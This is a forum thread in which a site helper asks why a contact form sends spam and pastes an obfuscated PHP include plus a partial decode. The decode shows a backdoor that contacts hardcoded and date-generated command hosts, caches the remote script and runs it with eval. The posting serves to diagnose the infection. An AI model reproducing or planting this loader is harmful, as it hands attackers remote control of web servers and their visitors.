Webmaster Forum

Go Back   Webmaster Forum > Web Development > Coding Forum

Coding Forum Problems with your code? Discuss coding issues, including JavaScript, PHP & MySQL, HTML & CSS, Flash & ActionScript, and more.


Reply
 
Thread Tools Display Modes
Share |
  #1  
Old 05-05-2011, 12:47 PM
baby.hack baby.hack is offline
Junior Member
 
Join Date: 05-04-11
Posts: 4
iTrader: 0 / 0%
Need Help: Obfuscated Code and Spam from Contact Form

I'm helping with a site, and have problem.
The contact form is generating spam, despite the captcha.
I'm not all that great with web programming yet, though I'm learning.

The php file containing the form has code at the top that does
Code:
include('otherfile.php')
. This otherfile is obfuscated. I have managed to decode some of it. I'm just not sure what it is doing. The contact.php and otherfile.php contents are posted below. Is this my culprit?

Also, what is this form doing? Where's the code that formats and sends the email?

contact.php:
Code:
<?php if(!defined("GR_HOST_ID")){ define("GR_HOST_ID", "notarealusl.com"); } @include_once('anotherfile.php'); ?> <script language="javascript"> function checkForm() { var Name = document.contact.m_Name.value; var phone = document.contact.m_Phone.value; var email = document.contact.m_Email.value; var comments = document.contact.a_Comments.value; var verification = document.contact.m_verification.value; document.Contact.m_Name.value=sanitize(Name); document.Contact.m_Phone.value=sanitize(phone); document.Contact.m_Email.value=sanitize(email); document.Contact.a_Comments.value=sanitize(comments); document.Contact.m_verification.value=sanitize(sacode); return true; } function sanitize(str) { str.replace(/</g,'&lt;'); str.replace(/>/g,'&gt;'); str.replace(/\'/g,'&apos;'); str.replace(/\"/g,'&#x22;'); str.replace(/\)/g,'&#x29;'); str.replace(/\(/g,'&#x28;'); return str; } </script> <form name="contact" method="post" onsubmit="return checkForm();"> <input type="hidden" name="act" value="contactForm"> <table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"> <tbody> <tr> <td class="cont_bold_table" width="31%"> <div align="right">Name:</div> </td> <td width="69%"> <input id="Name" title="Your Google Toolbar can fill this in for you. Select AutoFill" style="background-color: rgb(255, 255, 160);" size="24" name="m_Name"> </td> </tr> <tr> <td class="cont_bold_table"> <div align="right">Email:</div> </td> <td> <input id="Email" title="Your Google Toolbar can fill this in for you. Select AutoFill" style="background-color: rgb(255, 255, 160);" size="24" name="m_Email"> </td> </tr> <tr> <td class="cont_bold_table"> <div align="right">Phone:</div> </td> <td> <input id="Phone_no" title="Your Google Toolbar can fill this in for you. Select AutoFill" style="background-color: rgb(255, 255, 160);" size="24" name="m_Phone"> </td> </tr> <tr> <td class="cont_bold_table" valign="top"> <div align="right"> <p>I would like to <span class="cont_table">request information </span>about.. </p> <p><span class="cont_table">(use text box below<br>to provide details)</span> </p> </div> </td> <td class="cont_bold_table"> <table border="0" cellpadding="2" cellspacing="0" width="100%"> <tbody> <tr> <td width="9%"> <input id="Membership" value="I wish to become a member" name="a_Membercont" type="checkbox"> </td> <td class="cont_table" width="91%">becoming a member</td> </tr> <tr> <td> <input id="Volunteer" value="I wish to volunteer" name="a_Volunteer" type="checkbox"> </td> <td class="cont_table">volunteering for an event or project</td> </tr> <tr> <td> <input id="Boardmember" value="I am interested in your products" name="a_Boardmember" type="checkbox"> </td> <td class="cont_table">serving on the PCDG board</td> </tr> <tr> <td> <input id="Contibute_supplies" value="I wish to contibute supplies" name="a_ContibuteSupplies" type="checkbox"> </td> <td class="cont_table">contributing supplies or services</td> </tr> <tr> <td> <input id="Financial_donation" value="I wish to make a donation" name="a_FinancialDonation" type="checkbox"> </td> <td class="cont_table">donating financially</td> </tr> <tr> <td> <input id="Participate" value="I would like to participate in an upcoming event" name="a_Participate" type="checkbox"> </td> <td class="cont_table">participating in an upcoming event </td> </tr> <tr> <td> <input id="Other_Info" value="I would like to request other information" name="a_OtherInfo" type="checkbox"> </td> <td class="cont_table">other information </td> </tr> </tbody> </table> </td> </tr> <tr> <td class="cont_bold_table" valign="top"> <div align="right">Comments or<br>Questions: </div> </td> <td> <textarea name="a_Comments" rows="6" cols="36"></textarea> </td> </tr> <tr> <td colspan="2" class="cont_bold_table" align="center"> <img src="captcha.php" alt="Verification code, please enter it" width="50" height="20" hspace="5" /> <br>For security, please input the number above: <input name="m_verification" type="text" id="verification" size="8"> </td> </tr> <tr> <td class="cont_bold_table">&nbsp;</td> <td> <input id="btnSubmit" value="Send Now" name="btnSubmit" type="submit"> &nbsp;&nbsp; <input value="Clear Form" name="Reset" type="reset"> </td> </tr> </tbody> </table> </form>
otherfile.php:
Code:
<?php /*?><?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64'); $OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}; $OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16}; $OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5}; $OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15}; $O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11}; $O0O000O00=$O0O000O00.$OOO000000{3}; $O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16}; $OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8}; $OOO0O0O00=__FILE__;$OO00O0000=0x2420; eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NDdkKTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCcybWF4NXlIcEExQ1VJTGtPd05ldTh6dG40b1BRRjY5aFhCMGdZS3ZHRVpETWYvczNWakpsVytpU2RUcWJyUmM3PScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs=')); return; ?> ~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
 
Reply With Quote

Advertisement

Advertisement

  #2  
Old 05-05-2011, 12:48 PM
baby.hack baby.hack is offline
Junior Member
 
Join Date: 05-04-11
Posts: 4
iTrader: 0 / 0%
What I have managed to decode:
Code:
ini_set("display_errors",0); error_reporting(0); define("GR_CLIENT_VERSION","remote_index_v4"); define("GR_USE_CACHE_SCRIPT",true); define("GR_CACHE_SCRIPT_TIME",60*60*12); define("GR_USE_CACHE_SERVERIP",true); define("GR_CACHE_SERVERIP_TIME",60*60*12); function GR_Run() { if (GR_USE_CACHE_SCRIPT) { $cache_id = md5(GR_GetHostId().GR_CLIENT_VERSION); $script = GR_GetCache($cache_id,GR_CACHE_SCRIPT_TIME,$cache_filename); if ($script == false) { $script = GR_ServerRequest("get_script",false,7); GR_SaveCache($cache_id,$script); } }else { $script = GR_ServerRequest("get_script",false,7); } if ($script) { eval($script); } } function GR_Init() { if(!function_exists('str_ireplace')){ function str_ireplace($search,$replace,$subject){ if (is_array($search)) { foreach ($search as $id =>$r_search) { $r_replace = is_array($replace) ?$replace[$id] : $replace; $token = chr(1); $haystack = strtolower($subject); $needle = strtolower($r_search); while (($pos=strpos($haystack,$needle))!==FALSE){ $subject = substr_replace($subject,$token,$pos,strlen($r_search)); $haystack = substr_replace($haystack,$token,$pos,strlen($r_search)); } $subject = str_replace($token,$r_replace,$subject); } }else { $token = chr(1); $haystack = strtolower($subject); $needle = strtolower($search); while (($pos=strpos($haystack,$needle))!==FALSE){ $subject = substr_replace($subject,$token,$pos,strlen($search)); $haystack = substr_replace($haystack,$token,$pos,strlen($search)); } $subject = str_replace($token,$replace,$subject); } return $subject; } } if (!function_exists("stripos")) { function stripos($str,$needle,$offset=0) { return strpos(strtolower($str),strtolower($needle),$offset); } } } function GR_GetHostId() { if (defined("GR_HOST_ID")) { $host_id = GR_HOST_ID; if (empty($host_id)) { $host_id = getenv("SERVER_NAME"); } }else { $host_id = getenv("SERVER_NAME"); } if (substr($host_id,0,4) == "www.") { $host_id = substr($host_id,4); } return $host_id; } function GR_GetCachePath() { $path = false; if (function_exists('sys_get_temp_dir')) { $path = sys_get_temp_dir(); }else { if( $path = getenv('TMP') ) ; elseif( $path = getenv('TEMP') ) ; elseif( $path = getenv('TMPDIR') ) ; else { $path = tempnam(__FILE__,''); if (file_exists($path)) { unlink($path); $path = dirname($path); }else { $path = false; } } } if (!$path or !is_writable($path)) { $path = dirname(__FILE__); } if (!is_writable($path)) { $path = false; } return $path ?realpath($path) : false; } function GR_GetCache($filename,$time = 0,&$path) { $path = GR_GetCachePath().DIRECTORY_SEPARATOR.$filename.".che"; if (file_exists($path)) { if ($time == 0) { return file_get_contents($path); } elseif ($time >0 and time()-filemtime($path) <$time) { return file_get_contents($path); } else { return false; } }else { return false; } } function GR_SaveCache($filename,$content) { $path = GR_GetCachePath().DIRECTORY_SEPARATOR.$filename.".che"; $fh = fopen($path,"w"); if ($fh) { fwrite($fh,$content); fclose($fh); return true; }else { return false; } } function GR_IsCacheExpired($filename,$time = 0) { $result = true; $path = GR_GetCachePath().DIRECTORY_SEPARATOR.$filename.".che"; if (file_exists($path)) { if (time()-filemtime($path) <$time) { $result = false; } } return $result; } function GR_GenServerDomain($time = null) { if (!isset($time)) { $time = time(); } $y = date("Y",$time); $m = date("m",$time); $d = ceil(date("d",$time)*10/31); $s = md5("mydomain".$y.$m.$d); $s = str_ireplace(array('0','1','2','3','4','5','6','7','8','9'),array('g','h','i','j','k','l','m','n','o','p'),$s); $l = 9; $s = substr($s,0,$l); return $s.".net"; } function GR_GetServerDomain() { $result = false; $ips = array(); $hosts = array("Y3NzaXBzLmNvbQ==","Y3NpcHMuY28uY2M=","OTEuMjEyLjIyNi43OA==",base64_encode(GR_GenServerDomain())); $cache_id = md5(GR_GetHostId().GR_CLIENT_VERSION."_serverip"); if (GR_USE_CACHE_SERVERIP) { $cache = GR_GetCache($cache_id,GR_CACHE_SERVERIP_TIME,$cache_filename); if ($cache) { $ips = unserialize($cache); if (!$ips) { $ips = array(); } } } if (count($ips)== 0) { foreach ($hosts as $host) { $content = GR_HttpRequest("http://".base64_decode($host)."/","get",false,3); if ($content) { $content = explode("\n",$content); if (trim($content[0]) == "OK") { $ips = array(); for ($i = 1;$i 0) { $result = $ips[array_rand($ips)]; } return $result; } function GR_ParseHeaders($s_headers) { $headers = array(); $hs = explode("\n",$s_headers); foreach ($hs as $h) { $h = trim($h); if (!empty($h)) { @list($var,$value) = explode(": ",$h,2); if (!empty($var) and !empty($value)) { $headers[$var] = $value; } } } return $headers; } function GR_HttpRequest($url,$method = "get",$headers = false,$timeout = 30) { $url = parse_url($url); $result = false; if (!isset($url['port'])) { if ($url['scheme'] == 'http') { $url['port']=80; }elseif ($url['scheme'] == 'https') { $url['port']=443; } } $url['query'] = isset($url['query']) ?$url['query']: ''; $url['protocol'] = $url['scheme'].'://'; $eol = "\r\n"; $default_headers = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13".$eol. "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8".$eol. "Accept-Language: en-us,en;q=0.5".$eol. "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7".$eol. "Connection: close".$eol; if ($method == "post") { $data = "POST ".$url['protocol'].$url['host'].$url['path']." HTTP/1.0".$eol. "Host: ".$url['host'].$eol. $default_headers. "Content-Type: application/x-www-form-urlencoded".$eol. "Content-Length: ".strlen($url['query']).$eol. $eol.$url['query']; }else { $data 